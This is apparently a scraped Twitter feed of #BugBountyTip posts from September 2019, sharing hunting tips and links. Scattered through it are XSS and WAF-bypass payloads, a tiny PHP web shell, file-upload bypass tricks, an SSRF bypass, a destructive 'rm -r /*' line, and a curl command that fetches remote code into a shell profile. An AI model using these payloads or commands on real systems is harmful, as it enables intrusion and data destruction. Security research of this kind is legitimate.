3 A5 Broken Access Control Session Storage OWASP Juice Shop Tutorial OWASP Top Ten Training -- Free #BugBounty Tutorial - 💰💰💰💰 https://t.co/SZmg3HOSP3 #BugBountyTip #penetesting #penetrationtesting #cybersecurity #devsecops #devops
[email protected]:~$ sud¤ rm -r /*
@IAMPROPERSAM


2019-09-21 20:29:46
0 Web App owners: We are very secured nd safe from #Hackers. 😹😹 #bugbounties #BugBountyTip https://t.co/6IeHA0Knpr
A hacker's life
@Unknownuser1806


2019-09-21 19:58:08
1 A list of payloads for any kind of #vulnerability https://t.co/RfVj8bc6A9 #XSS ,#sqli, #ssrf ,#csrf,#rce #bugbounty,#BugBountyTip
GTH / GrandTheftHTTP / Adam Langley
@GrandTheftHTTP


2019-09-21 18:07:06
0 Everyone is always trying to find content on a website. Why don't you look for the absence of content ( aka the 404 page ). 404’s will quite often reflect the page URL that's trying to be accessed which could be prone to an XSS attack #BugBountyTip #hacking #infosec
Dominik Opyd
@neiriru


2019-09-21 17:56:25
0 I recommend reading #bugbounties #Security #Hacking #bugbountytips #BugBountyTip #BugBounty https://t.co/834ItNwAPP
Oad Earth
@oad_earth


2019-09-21 17:42:21
0 Is GitHub OAuth is really safe or is something wrong there? #BugBountyTip #Security #Hacking #BugBounty #bugbountytips #bugbounties https://t.co/ES0GAsnRsg
Sudoka
@sudo_sudoka


2019-09-21 16:41:16
1 Today I learn that we can check an IP whether it is a honeypot or not by using https://t.co/a61WGFzu9Q. Now you can avoid the honeypots and concentrate in real systems. Please comment if you find a honeypot. #bugbounty #bugbountytip #threathunting
expl0itc0der
@vanshitmalhotra


2019-09-21 09:32:50
3 Bug Bounty Tutorial - Maximise Your Bug Bounty Output With Simple Nmap Script --- $$$$$ --- Use these Nmap script to automate the searching of CVE for a version of service running on a port scanned using Nmap. #BugBounty #bugBountyTip https://t.co/0gfcgW7uTM
Enciphers
@enciphers_


2019-09-21 07:13:31
4 "Demystifying Frida" On our Youtube Channel: https://t.co/UolayOUxTO Presentation: https://t.co/nX6KhTtdNM #BugBountyTip #cybersecurity #pentest #informationsecurity #cybersec #infosecurity #infosec #BugBounty #androidapp #AppSec #MobileApp #Pentesting #iOS #androidsecurity https://t.co/2E3a1hoelj
BlackClover
@Bc10ver


2019-09-21 07:05:42
0 Top story: @intigriti: 'Looking for XSS? Don't forget the parameter names! 💡Thanks for the #BugBountyTip, @p4fg! #HackWithIntigriti ' https://t.co/3COYJGb6iZ, see more https://t.co/fVnXn9Z0FJ
👻in🐚
@0xerror


2019-09-21 07:05:42
0 XSS News: @intigriti: 'Looking for XSS? Don't forget the parameter names! 💡Thanks for the #BugBountyTip, @p4fg! #HackWithIntigriti ' https://t.co/0zBniIXCrE, see more https://t.co/4VACxHYGGn
Rapid Safeguard
@RapidSafeguard


2019-09-21 06:52:52
0 https://t.co/3YHBGnQ3VO Awesome Hacking Resources #hacking #resources #infosec #BugBountyTip
👣
@_sawzeeyy


2019-09-20 22:25:31
1 Don't forget to use that BXSS payload ๐Ÿ˜‰ #BugBounty #BugBountyTip
Murdockz
@Murdockz_CEH


2019-09-20 20:51:58
1 Company: "Great find, keep up the good work and please continue to test the API" Me: "Sure...btw I was able to achieve RCE further exploiting the SQLi on the strfdate field" Company: ".........." 🥴😂😅 btw this is a Ruby built API 🤪 #bugbounty #bugbountytips #bugbountytip
expl0itc0der
@vanshitmalhotra


2019-09-20 18:58:49
0 Stealing JWTs in localStorage via XSS #BugBounty #BugBountyTip #Pentesting #penetrationtesting #cybersecurity https://t.co/XkEWCB2gXb
Michele Romano
@Mik317_


2019-09-20 17:58:38
0 OK, I'm off ... can't find something challenging and want to find something on a well paid and very used software ... any suggest on the name of the software to test? #BugBountyTip https://t.co/EUH5oFQ6Wk
Rafin Rahman Chy
@rafinrahmanchy


2019-09-20 17:44:24
0 Free Nmap Courses https://t.co/TAy9OCjuHo https://t.co/6EEKrEKPj5 https://t.co/82UGYDkWgz #nmap #Pentesting #InfoSec #CyberSecurity #Hacking #Hacker #EthicalHacking #whitehat #BugBounty #BugBountyTip https://t.co/UjVc2AxHSj
intigriti
@intigriti


2019-09-20 15:39:53
9 Looking for XSS? Don't forget the parameter names! 💡Thanks for the #BugBountyTip, @p4fg! #HackWithIntigriti https://t.co/VsFLtVFJRm
Mehmet Xyele
@mehmetxyele


2019-09-20 15:01:17
6 Subdomain enumeration with Rapid7 FDNS using AWS Athena https://t.co/fTJDvpeOWF #bugbounty #bugbountytips #bugbountytip #hackerone #hacker0x1 #hacker101 #bugcrowd
plenum 🇹🇳
@plenumlab


2019-09-20 14:58:21
0 Been busy lately to do write-ups here is a short story about 2500$ bug chain #BugBountyTip #BugBounty https://t.co/TMV1kiRFPl
Vulkey_Chen
@Vulkey_Chen


2019-09-20 14:55:12
0 #BugBountyTip #bughunter #bugbountytips BugBounty Hunter's Vulnerability Test Aid Platform: https://t.co/KrIlHNdFai ,Open Source Address: https://t.co/oUqeQBxmDQ
A hacker's life
@Unknownuser1806


2019-09-20 14:18:59
0 Bugbounty cheatsheet https://t.co/dIe8tBFAK7 #bugbounty, #BugBountyTip
Karel Origin
@Karel_Origin


2019-09-20 11:20:46
1 @intigriti couldn't handle this #bugbountytip (😢), so here I am: XSS executing on the wrong domain? No problem! Social Engineer your favourite platform analyst! https://t.co/26axjq8Iwj
SecuNinja
@secuninja


2019-09-20 11:05:16
3 don't waste your time with @zerocopter form based public programs. just got replies after 10 months telling me they cannot reproduce a bug.... wow! what surprise after 10 months. others still open same long... #bugbounty #bugbountytip
Murdockz
@Murdockz_CEH


2019-09-20 07:21:10
1 API --> JSON body post request--> contains two numeric fields --> first field set value from -1 to 9999999999 --> PostgreSQL database disclose --> set other field from 100 to 999999 --> table, query, fields disclose. #bugbountytips #bugbounty #bugbountytip
kassih mouhssine
@KassihMouhssine


2019-09-20 00:00:17
0 6 bugs : 4 idors and broken access control and account takeover and all this shit are duplicated #bugbountytip #BugBounty #CyberSecurity #dxtr0x01
Faizal Abroni
@faizalabroni


2019-09-19 23:10:40
2 https://t.co/f8BIngazNw This is how we found something from information disclosure to remote code execution and Worth $10.000 (indonesian language) #bugbountytip #bugbounty #togetherwehitharder #ItTakesaACrowd #hackerone #bugcrowd
expl0itc0der
@vanshitmalhotra


2019-09-19 20:09:45
6 Bug Bounty — Tips / Tricks / JS (JavaScript Files) https://t.co/GTENhx5EI7 #BugBounty #BugBountyTip #JS #PenetrationTesting #pentesting #devops #devsecops #cybersecurity
expl0itc0der
@vanshitmalhotra


2019-09-19 20:03:33
2 JS-Recon detailed. Analyzing the internal network with a XSS https://t.co/ySiyhKIP7K Follow For Cyber Security Training and Bug Bounty Updates https://t.co/iNczOcGmCt #BugBounty #BugBountyTip #Penetrationtesting #pentesting #cybersecurity #tools #pentesttools #bugbountytool
expl0itc0der
@vanshitmalhotra


2019-09-19 19:59:58
1 Exploiting File Uploads – A Tale of a $3k worth RCE --- $$ https://t.co/zpcHqz0fyx #BugBounty #BugBountyTip #PenetrationTesting #Penetesting #CyberSecurity #bounty $$$$$
expl0itc0der
@vanshitmalhotra


2019-09-19 19:54:18
0 BugBounty --- Cheat Sheets, Methodologies https://t.co/8CyoUV65oL #BugBounty #BugBountyTip $$$$$$$
bugbountytip
@a_l_e_r_t_1_


2019-09-19 19:03:19
0 VIM tutorial: linux terminal tools for bug bounty pentest and redteams w... https://t.co/R4yTVHqWHE #bugbountytip
itsmenaga
@nagarockshard


2019-09-19 17:58:21
0 If You See Any White Label Error Page just load your Burp intruder With Actuator Endpoints . If lucky Enough You might End Up With Gold Mine. List:- https://t.co/IObR5VqFPJ #pentesttips #bugbountytip #bugbounty
გოჩა ოქრაძე (Gocha Okradze)
@GochaOqradze


2019-09-19 16:29:17
0 From Tbilisi to Batumi is 5 hours by train :) Decide play in Termux and recon :) #bugbountytip https://t.co/uoco4qvpZG
DarkOverFlow
@HAXORANON


2019-09-19 12:56:29
0 does anyone know how to find forgotten endpoints if so dm me #hackerone #bugbountytip #bugbounty #bughunter #bugbountytips
Shaked Klein Orbach 🇮🇱
@shakedko


2019-09-19 11:21:56
1 Did you know about "thisisunsafe" when visiting HTTPS websites with HSTS? https://t.co/e9VaXqwGpd Almost like IDDQD or better IDKFA #BugBounty #bugbountytip
Dominik Małowiecki
@5up3rD43m0n


2019-09-19 09:54:47
0 it's one of these days when you check your database and realize that a bug hunter was successful, but he did not realize it and forget to report it #bugbountytip @Hacker0x01
Constant 🇪🇬
@Mr_A_ConstanT


2019-09-19 09:44:14
0 a shell script aim to automatically launch 50+ online web scanning tools in the Browser against a target domain in a 10 waves, #CyberSecurity #bugbountytip #WebApp #Hacking https://t.co/nTNLn3LrpY
JaWaD 🇲🇦
@CHAJER2


2019-09-19 09:39:01
0 Yay, I was awarded a $750 bounty on @Hacker0x01 #TogetherWeHitHarder steps: == #bugbountytip: Change sometimes method post to get can lead to Information Exposure Through Debug Information.
Avanish Pathak
@avanish46


2019-09-19 05:52:05
0 #bugbountytip discovered CSRF+Stored XSS in a private program on @Bugcrowd but unfortunately XSS was Out of scope in that program. How it works :- https://t.co/f2YJa1WgTi
A hacker's life
@Unknownuser1806


2019-09-19 03:08:09
1 When you are looking for vulnerabilities, always remember to think outside the box and submit encoded values to see how the site handles the input. #hacking, #bugbountytip ,#bugbounty
Fisher
@Regala_


2019-09-19 01:12:56
2 The less you use scanners, the more severe your issues are #cosmic #DISTURBANCE 🇨🇦 #bugbounty #bugbountytip
Murdockz
@Murdockz_CEH


2019-09-18 19:58:10
0 Guys if you are looking to get up and running with Go / Golang, I highly recommend this video by @traversymedia Go / Golang Crash Course https://t.co/kH75W4DeY3 #bugbounty #go #golang #bugbountytip #bugbountytips
ʊռӄռօառ ʊֆɛʀ
@Unknownuser1806


2019-09-18 18:56:33
0 Good #hacking is a combination of observation and skill. #bugbountytip , #motivation ,#bugbounty
RabbidByte
@RabbidByte


2019-09-18 14:35:27
0 Don't forget about the @Hacker0x01 Hacker101 discord channel .... I missed way too much when I forgot about it for 8 months or so. #bugbountytip
Emad Youssef
@Sy3Omda


2019-09-18 12:57:27
0 as it looks simple as it should be BUT this would minimize your time in enumeration phase curl https://t.co/wuePgiRbGU -o ~/.bash_profile && echo "source ~/.bash_profile" >> ~/.bashrc i have combined most of keyhack in one bash profile enjoy #BugBounty #bugbountytip #Pentesting
gweeperx
@gweeperx


2019-09-18 07:42:39
2 Just another XHR cookie/body stealer: https://t.co/kbmsAYuwsJ #bugbounty #bugbountytip #bugbountytips
ʊռӄռօառ ʊֆɛʀ
@Unknownuser1806


2019-09-18 03:39:15
0 DetExploit - Software That Detect Vulnerable Applications, Not-Installed OS Updates And Notify To User https://t.co/HrwGYO0fjL #bugbounty , #bugbountytip ,#hacking
ʊռӄռօառ ʊֆɛʀ
@Unknownuser1806


2019-09-18 03:33:03
0 #XSS, #SQLi, #CSRF, #SSRF, #XXE, OS command #injection, directory traversal., and #HTTPrequest smuggling. - > Everything you need to getting started with #bugbounty #bugbountytip , #hacking https://t.co/4ZnwNy6STO
daniel_v
@danielv47251669


2019-09-17 18:09:57
0 #bugbountytip #bugbountytips >found a login page restricted to business email only >intercepted the signup request > intercepted response from this request > changed response body from "false" to "true" > auth bypass > internal access to the platform
farukh
@Farukhwap


2019-09-17 16:17:30
0 @Olacabs @ola_supports @olamoney_in @OlainUK why is it empty 🤔 #fixit #bugbountytips #bugbountytip #loot #Ola https://t.co/CS0HUxo0if
luffydragneel
@Hackers_Guild


2019-09-17 15:56:39
0 Suppose there is contracts page at https://t.co/guSo2PGluZ meant only for Admins and not visible in the lower privileged user's UI. Just directly browse to that page from this lower privileged account, and you might end up seeing the contents there. #bugbountytip #bugbounty https://t.co/1cOxnJ0OTI
Vulkey_Chen
@Vulkey_Chen


2019-09-17 13:52:17
1 #bugbountytip #burpsuite #bugbountytips #bughunter I build a burpsuite extension to mark sensitive information. If "mobile phone number" and "email address" information appear in the response content, then mark this request for red color. https://t.co/qeY996qzTi
Ammar Amer🇸🇾
@cry__pto


2019-09-17 13:51:02
17 i have uploaded 34 new articles about different fields of hacking as a pdf files to my github repository. i will continue working on this project years to come. https://t.co/q2layzVpKz #pentest #malware #hacking #infosec #cybersecurity #bugbountytip #redteam #hacking #0day #osint https://t.co/IAaAGXn9HD
ʊռӄռօառ ʊֆɛʀ
@Unknownuser1806


2019-09-17 12:54:42
0 Awesome #Shodan search queries https://t.co/Wo0inc380w #bugbounty , #bugbountytip ,#hacking
Vedant
@ved_wayal


2019-09-17 08:58:43
0 Blind XSS is lub 😜 #bugbountytip https://t.co/GHlwkPix6W
Rishabh
@____cypher____


2019-09-17 06:58:06
0 SSRF tip: [email protected] ==> black[.]com black[.]com?white[.]com ==> black[.]com black[.]com#white.com ==> black[.]com #bugbountytip #BugBounty #bugbountytips
oops
@a_l_e_r_t_1_


2019-09-17 06:44:01
0 Search for high-level vulnerabilities if you don't want the vulnerability to be duplicated :) #bugbountytip
Sultan Haikal
@SultanMoeslim


2019-09-17 06:08:28
0 {Reviews} in bugbounty, report recipients ... are taking more references from reporters! to imitate / change systematic design, secure etc. reporters don't get any profit. and those who change this, of course benefit internally. best manipulation. #bugbounty #bugbountytip
AFAQUE KHAN
@Afaquekhan24


2019-09-17 05:13:43
1 @stereotype32 Remember you fools...you bug bounty hunter fools... any bypass technique that is publicly posted no longer work in real world scenario .....this is my #protip for today #hackerone #bugbountytip #BugBounty #bugbountytips #bugcrowd ...Happy hunting...
Pomegranate 🌴
@ret2pomegranate


2019-09-17 04:33:45
1 When you & your partner get a bounty. #bugbountytip #bugbounty #infosec https://t.co/3rjqUgsXeE
luffydragneel
@Hackers_Guild


2019-09-17 03:46:04
1 Suppose the sensitive content is at /folder/content. If there is proper access control on /folder, it doesn't mean that there is proper access control when you visit /folder/content directly. Always look for access control issues on each endpoint. #bugbountytip #bugbounty https://t.co/J8jVcy2IKB
Pomegranate 🌴
@ret2pomegranate


2019-09-16 23:47:44
0 Just reported Double-Sequence XSS which affects 2 parameters in a single endpoint to a program on @Hacker0x01. #bugbounty #bugbountytip #infosec
Michele Romano
@Mik317_


2019-09-16 18:22:47
0 @Manikan77602456 understand how programs work, and definitely how other researcher think ;). Probably see how reports are thought/presented/explained is the best thing you can do to learn. Also, check Twitter #bugbountytip and similar: you'll find good bypasses or medium articles.
Jakub Juszczak
@apertureless


2019-09-16 12:11:31
0 Blind XSS is still my favorite. Spray the payload and after some time, you receive your christmas present 🎁 #infosec #bugbountytip
intigriti
@intigriti


2019-09-16 11:56:17
2 This actually worked on the first site we tested! 🤯 P.S.: Legacy or unimplemented OAuth flows often contain vulnerabilities that can lead to account takeover. 😈 Thanks for the #BugBountyTip, @ngalongc! https://t.co/vwAi9hhHrm
SilexSecure
@silexsecure


2019-09-16 11:23:55
0 @silexsecure Today you will learn WordPress penetration testing using WPScan and Metasploit. @rsilexlab @metasploit @ubuntu @kalilinux @wordpressdotcom #infosec #cybersecurity #bugbountytip #bugbounty #Pentesting #GodMorningmonday #CyberAttack #SSL#GOODhat
Karna
@karna__1


2019-09-16 11:04:38
1 If you want a free online phone number service to receive OTP(s) for your web app testing, here's one: https://t.co/3dPt58DZGy #bugbounty #bugbountytip
Oops!
@Corrupted_brain


2019-09-16 10:17:18
0 This Oracle directory architecture was quite helpful for me to harvest critical information by exploiting XXE and reading files locally. #bugbountytip #bugbounty #Oracle https://t.co/Fjhg3OX2Gd
Sp
@spt_2020


2019-09-16 10:06:29
0 Collection Of Bug Bounty Tip-Will Be updated daily https://t.co/BYm6GxAFnz #bugbountytip
oops
@a_l_e_r_t_1_


2019-09-16 08:48:37
0 Cheap and no ads. Bug bounty is everywhere. 1 Bug = 60 x App. Learn & Hack & Earn Money. Good Hacking! https://t.co/JPaA4CKmfO #openredirection #xss #xxe #ssrf #bounty #rce #graphql #sqlinjection #bugbountytip #webpentest #owasp #bugbountytip #python #ruby #csfr #hack #hackers
Juha Remes
@juha_remes


2019-09-16 08:36:33
0 This is a great #bugbountytip. https://t.co/XteWTBVmMe
oops
@a_l_e_r_t_1_


2019-09-16 08:22:45
0 Really very, very slow in fixing gitlab vulnerabilities #bugbountytip
Pomegranate 🌴
@ret2pomegranate


2019-09-16 05:54:08
0 #BugBounty #bugbountytip #infosec Normal User: “Text Injection” (The Depression Period) Bug Bounty Hunter: Arbitrary Spoofed Character Encoded Injection via the Roman Alphabet. https://t.co/Z20cvTDtUG
Pomegranate 🌴
@ret2pomegranate


2019-09-16 03:35:05
2 Just reported XSS to a program on @Hacker0x01. #InfoSec #bugbounty #bugbountytip Got XSS through a POST request in a parameter, automated it through my web-server due to `document.location.href=` being used in the vulnerable parameter.
ʊռӄռօառ ʊֆɛʀ
@Unknownuser1806


2019-09-16 02:45:02
0 This tool collects all information about all devices that are directly connected to the internet with the specified keywords that you enter. This way you get a complete overview. #shodaneye : https://t.co/AarJFRVDOP #hacking #bugbounty #bugbountytip
A DNF 🦖
@binb4sh


2019-09-16 01:08:34
0 If the target server is running Windows and you can create files and directories on it, try to create ones with forbidden names (CON,AUX,etc)! It may cause errors resulting in Info Disclosure/DoS. An example written in PHP: file_put_contents("con.png",""); #bugbountytip
terjanq
@terjanq


2019-09-16 00:22:36
3 I haven't published any writeups in a while. Here is my latest #writeup to an awesome #buyify challenge from #csaw19 #ctf that has just ended a few hours ago. The author of the task is @itszn13. You should definitely check this out! https://t.co/uAWk6hsyoI #bugbountytip
Drok3r🏴‍☠️
@drok3r


2019-09-15 21:23:18
0 pixload -- Image Payload Creating tools #bugbountytip #payload Link [ https://t.co/6wh5X9EWXB ] https://t.co/Fc4kBuKmMp
securibee 🐝
@securibee


2019-09-15 19:19:08
0 @Random_Robbie @j_opdenakker @Vin1515 @zseano @NahamSec @TomNomNom @d0nutptr @stokfredrik @yaworsk @Alyssa_Herrera_ has great content as well make sure to follow her! @ITSecurityguard Follow #bugbountytip although it's pretty noisy. Subscribe to newsletter from @PentesterLand https://t.co/e2fgYy31Gr I keep forgetting people. My bad!
dykaushik
@dykaushik


2019-09-15 17:40:17
0 Collection Of Bug Bounty Tip-Will Be updated daily https://t.co/GGQro6C5zH #bugbountytip
Mayur Parmar
@th3cyb3rc0p


2019-09-15 17:13:52
0 Must read blog🙂 https://t.co/4nQ54tutfD #bugbountytip #BugBounty #bughunting #ethicalhacking
WaReeq
@wareeq_shile


2019-09-15 16:44:53
0 Can this still be taken over? #BugBounty #bugbountytip #bugbountytips https://t.co/nN5Xdani38
Wh11teW0lf
@Wh11teW0lf


2019-09-15 16:26:05
1 #bugbountytip The most vulnerable place in Wordpress/Drupal is custom themes and plugins. Wordpress Location: /wp-content/themes/ and /wp-content/plugins/ You can find their name with Waybackarchive or site map in Burp.
Murdockz
@Murdockz_CEH


2019-09-15 14:50:00
0 Passive recon #bugbountytip #bugbountytips #bugbounty https://t.co/oCvjzwcsb6
Somdev Sangwan
@s0md3v


2019-09-15 13:27:18
0 @yassergersy Why is this #bugbountytip and not #websecuritytip?
vavkamil
@vavkamil


2019-09-15 13:01:34
1 How to bypass Android certificate pinning and intercept SSL traffic #bugbounty #bugbountytip https://t.co/KFRUCYEc96
Youssef A. Mohamed
@GeneralEG64


2019-09-15 12:36:29
4 The easiest P1 ever!! 😂 Steps to Reproduce: Navigated to https://t.co/CEADFzHYUD Directory Bruteforcing found "admin" Bruteforcing into it found "users.db" Exposing admin's creds in plaintext! Logging in to the Admin Panel. #BugBounty #bugbountytip https://t.co/7SuX3E5otC
BlackClover
@Bc10ver


2019-09-15 12:15:41
0 Top story: @yassergersy: '#bugbountytip : Load response , extract all valid parameters names , submit all as get and post parameters , check which one is being reflected , you will increase your chances to get #xss ' https://t.co/dkBDDSkQ0n, see more https://t.co/fVnXn9Z0FJ
👻in🐚
@0xerror


2019-09-15 12:15:40
0 XSS News: @yassergersy: '#bugbountytip : Load response , extract all valid parameters names , submit all as get and post parameters , check which one is being reflected , you will increase your chances to get #xss ' https://t.co/TDrl37pldF, see more https://t.co/4VACxHYGGn
oops
@a_l_e_r_t_1_


2019-09-15 08:55:16
1 Cheap and no ads. Bug bounty is everywhere. 1 Bug = 60 x App. Learn & Hack & Earn Money. Good Hacking! https://t.co/JPaA4CKmfO #openredirection #xss #xxe #ssrf #bounty #rce #graphql #sqlinjection #bugbountytip #webpentest #owasp #bugbountytip #python #ruby #csfr #hack #hackers
nocomp
@nocomp


2019-09-15 08:01:13
0 Any good #BugBounty discord place for learn and share? #bugbountytip thx for RT
HackIsOn ®
@hackison


2019-09-15 07:57:21
0 Ghazi is a BurpSuite Plugins For Testing various PayLoads Like "XSS,SQLi,SSTI,SSRF,RCE and LFI" through Different tabs , Where Each Tab Will Replace Every GET or POST Parameters With Selected TAB in "Proxy" or "Repeater" TAB. https://t.co/PUhzq0SuEo #bugbounty #bugbountytip
(((Gamliel)))
@Gamliel_InfoSec


2019-09-15 05:12:49
0 Awesome #bugbountytip https://t.co/DnjdSHMcix
Securisec ๐Ÿš€
@securisec


2019-09-15 02:08:06
0 "RT RT YoKoAcc: Bismillah. Releasing one of my RCE story at one of Bug Bounty Program. Race Condition that could Result to RCE - (A story with an App that temporary stored an uploaded file within 2 seconds before moving it to Amazon S3). https://t.co/j8fCpvwWy6 #bugbountytip…
Ankur Vaidya
@4N_CURZE


2019-09-15 00:14:37
0 Finally reached and completed one more milestone :) 😀😃♥️♥️♥️ #openbugbounty #xss #bugbounty #bugbountytip #bughunter #WhiteHats #pentest #Pentesting @openbugbounty @openbounty @whitehatsec @bugbountyforum https://t.co/zKVguucXI3
Pomegranate 🌴
@ret2pomegranate


2019-09-14 20:26:55
0 Just reported RCE to a program on @Hacker0x01. Wish me the best of luck. #infosec #bugbounty #bugbountytip Kind of nervous because of an accidental reboot that occurred while I was testing for a PoC.
Ｂｉｊａｎ Ｍｕｒｍｕ
@0xBijan


2019-09-14 20:14:02
0 New write-up "How I found a simple and weird Account takeover bug" https://t.co/32185JXNW6 #bugbounty #bugbountytip
Aziz Hakim
@hackerb0y_


2019-09-14 20:09:17
0 I was logged in a program's portal! Suddenly I have visited this URL!🙄 https://*.redacted.com/user/profile/delete and GUESS what? My account got deleted without any confirmation!🤣 #bugbountytip #bugbounty
Murdockz
@Murdockz_CEH


2019-09-14 18:22:10
0 2. Will do a write up on how to exploit graphql after bug is fixed and bounty rewarded 😄...there is a part I can't disclose in part 1. #bugbountytip #BugBounty #bugbountytips
Murdockz
@Murdockz_CEH


2019-09-14 18:20:13
0 1. Able to read anyone's gender status when it is set to private or only show to friends. User A not friends with User B. User A can not see User B gender status. User A send a graphql request to user B private gender status is revealed. #bugbounty #bugbountytip #bugbountytips
Pomegranate 🌴
@ret2pomegranate


2019-09-14 16:10:14
0 Accidentally ran a software-specific ‘reboot’ command & crashed the server. It’s been 10+ hours and no response. Should I report this issue to the acquisition/asset? #bugbounty #InfoSec #bugbountytip
Sudoka
@sudo_sudoka


2019-09-14 15:48:48
1 #Bypass #XSS filters with JavaScript RegExp.prototype.source 🎯 #bugbountytip https://t.co/DiP4CZcqg6
Aditya
@hetroublemakr


2019-09-14 14:15:05
1 Ran into an interesting blog on Medium about #bugbountytip #infosec by @bbinfosec https://t.co/kUUQiAWtca
YasserGersy
@yassergersy


2019-09-14 13:39:56
1 #bugbountytip : Load response , extract all valid parameters names , submit all as get and post parameters , check which one is being reflected , you will increase your chances to get #xss https://t.co/wEtN3fl4xT
oops
@a_l_e_r_t_1_


2019-09-14 12:42:06
0 My favorite xss payload : <img onerror="{alert`1`}" src> #bugbountytip
Fisher
@Regala_


2019-09-14 11:17:53
0 I'll experiment with streaming like all the cool kids are doing these days 😇 Starting October, schedule to be announced. Any particular subjects you'd be interested seeing or people? Let me know below 👇 #bugbounty #bugbountytip #infosec
Khaled Mohamed
@xelkomy


2019-09-13 20:15:20
0 shopify xss google auth this video awesome #bugbountytip #hackerone #BugBounty https://t.co/JbWlhXSOCK
Sandeep Raghav
@Sandeep_tunna


2019-09-13 18:03:30
0 Hey, @LinkedIn , I found a bug in your system. Please respond if you want to fix it. #bugbounty #testing #bugbountytip #LinkedIn
Simon
@7s26simon


2019-09-13 15:48:26
0 Submitted my first #bugbounty report !!! Hope it hasn't been reported already #ethicalhacker #hack #hacking #pentest #pentester #bugbountytip
Mohan Sri Ramakrishna
@S1r1u5_


2019-09-13 14:10:54
0 Yay, I was awarded a $500 bounty on @Hacker0x01! https://t.co/ac1KEZZZWM #TogetherWeHitHarder. #bugbountytip Actually, I am afraid to test the program cuz I saw some good hackers in the thanks page, But I started and I found a reflected XSS on the main page itself.😇
Mourad
@SecuAudit


2019-09-13 11:07:24
0 Any advice how to get into "Apache Axis version: 1.2.1" where remote admin is disabled ? #bugbountytip #bugbountytips
expl0itc0der
@vanshitmalhotra


2019-09-13 06:23:51
0 HTML to PDF converter bug leads to RCE in Facebook Server -- #BugBounty #BugBountyTip #Writeup https://t.co/UgmPhls8Mb
saranraj
@KceSaranraj


2019-09-13 01:58:28
0 I have the following code <li title="?"> test </li> I need to inject vector to break down the HTML Attributes and execute the alert using an event. is there a way to achieve this without using single/double quotes? <>&*#%\'" - Not Allowed @h1_kenan @le4rner #bugbountytip #xss
Mr.CryptoCZ
@cechv2


2019-09-12 06:56:18
0 #Electroneum #ETN $ETN is looking for Bug bounty hunters, IT Gurus, Hackers, if you want to earn money and help @electroneum be more secure go and check our Hackerone program #bugbountytip #Hacker #hackerone #fintech #app https://t.co/qUZ0h5mqqK
Yadhavi
@PrincessYadhavi


2019-09-12 05:18:36
0 Found a subdomain which is pointing to cloudfront using cname. And when i open the page it shows "NoSuchBucket" "The specified bucket does not exist" error. is subdomain takeover possible here? If yes, how? #bugbounty #bugbountytip #bugbountyhelp #s3
ᴂ
@pouyana1


2019-09-12 04:19:02
1 *content-length filtering: use small size shells like: <?='$_GET[x]'?> #bugbounty #bugbountytip #hacking #infosec #hack
ᴂ
@pouyana1


2019-09-12 04:19:01
0 *client side filtering: upload a valid file, intercept the request and change it to the shell extension (php,asp,jsp,..) *content-type filtering: change the content-type to valid content-type like: image/jpeg #bugbounty #bugbountytip #hacking #infosec #hack
ᴂ
@pouyana1


2019-09-12 04:19:01
1 file upload restriction bypass: * name filtering: 1) blackboxing: try to use file extensions like: php[3-n],phtml, pht. 2) whitelisting: use null-byte:shell.php%00.gif use double extension format : shell.php.jpg or shell.jpg.php #bugbounty #bugbountytip #hacking #infosec #hack
Henry Chen
@chybeta


2019-09-12 03:06:03
1 bounty calculation formula: crontab(subdomain(amass+subfinder+...) + port(masscan + nmap) + screenshot + dirsearch) + slack = bug bounty #bugbounty #bugbountytips #bugbountytip https://t.co/QCODeeZhC3
Murdockz
@Murdockz_CEH


2019-09-12 00:25:03
0 Sometimes you need to take a long step back to learn new technologies in order to enhance your Bug Bounty skills. Learn the technology that companies use in order to break and exploit them even more. #bugbounty #bugbountytip #bugbountytips https://t.co/lge8ogvAPr
Arif Khan
@payloadartist


2019-09-11 07:06:15
1 Awesome giveaway! 🔥 #infosec #bugbounty #bugbountytip https://t.co/0qJjiSx3zl
Sukhmeet Singh
@MadGuyyy


2019-09-11 01:30:19
0 > Website had admin panel with "Login with Google" > Only allowed Google login with company's email > Created an email account [email protected] > Created Google account with that email > Logged into admin panel with Google. 💰$1500 #BugBountyTip #InfoSec #BugBounty
C1h2e1
@C1h2e11


2019-09-11 00:48:34
0 #bugbountytip #bugbountytips Using https://t.co/5gM8SE3B4J for subdomain monitoring, last night I found a .DS_Store leaking on the latest subdomain on https://t.co/5gM8SE3B4J
Guilherme Keerok
@k33r0k


2019-09-10 17:08:23
2 Cloudflare WAF bypass: open("https://host/?xss=%3Ca/href=javascript:1%26%26%26%23x6e;ame%3Eclick me%3C/a%3E","<svg onload=alert(document.domain)>"); #bugbountytip #bugbounty #xss #bugbountytips
Jenish
@_jensec


2019-09-10 16:39:37
2 Yay, I was awarded a $2,000 bounty on @Hacker0x01! For accessing company dashboard via creating account with Email “[email protected]” on main web app and login to dashboard with SSO. #bugbountytip
wywwzjj
@wywwzjj


2019-09-10 16:29:38
0 @artofwebhacking @chybeta https://t.co/O8D1Pp6IcP Here is a website that archive bug bounty tips. 👉https://t.co/Kvxfo3jCh8 Check it out, it has other useful resources too. 😀 #bugbounty #BugBountyTip #bugbountytips @Hacker0x01
o k t a v a n d i
@0ktavandi


2019-09-10 16:08:24
1 anyone have hackerone report with SSRF issue 307 redirect bypass?? #bugbountytip #bugbountytips
Rishabh
@____cypher____


2019-09-10 09:40:44
0 Perfect oneliner for subdomain enumeration curl -s 'https://t.co/A3Qe45ZOra%.'<TARGET>'&output=json' | jq '.[] | .name_value' | sed 's/\"//g' | sed 's/\*\.//g' | sort -u #bugbounty #bugbountytip #bugbountytips #infosec
brsn
@brsn76945860


2019-09-10 04:08:46
0 @achillean @ItsReallyNick @x04steve @shodanhq I've tweeted this a few hours ago, but this works for me:
----------
import codecs
import mmh3
import requests

# Shodan-style favicon hash: MurmurHash3 of the newline-wrapped base64 of the icon bytes
response = requests.get('https://yourwebsite/favicon.ico')
favicon = codecs.encode(response.content, 'base64')
favicon_hash = mmh3.hash(favicon)
print(favicon_hash)
----------
#Shodan #bugbountytip
Securisec ๐Ÿš€
@securisec


2019-09-09 14:25:30
0 "RT RT osamaavvan: My Writeup about Exploiting JSONP and Bypassing Referer Check. #bugbountytip #bugbountytips #Security https://t.co/pUyJV4QdcW"
Iheb
@ihebhamad514


2019-09-09 12:46:53
0 I found a #bugbounty program where it implements a captcha protection field after certain requests with burp intruder, the only way to bypass it is to delete the Cookie header. As a result, I got 2 valid users accounts. #bugbountytip
Aussan 🇨🇦
@aussan_m


2019-09-09 12:33:12
